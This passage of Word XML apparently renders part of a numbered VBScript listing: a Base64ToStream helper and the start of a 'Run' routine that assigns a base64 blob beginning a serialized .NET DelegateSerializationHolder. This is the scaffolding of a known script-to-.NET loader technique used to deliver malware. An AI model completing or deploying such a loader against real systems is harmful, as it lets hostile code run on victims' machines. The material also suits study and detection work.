          <w:color w:val="989898"/>
          <w:spacing w:val="53"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"System.IO.MemoryStream"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1397" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>  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ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TransformFinalBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GetBytes_4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>length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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*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80053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="8659" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>entry_class</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6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21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
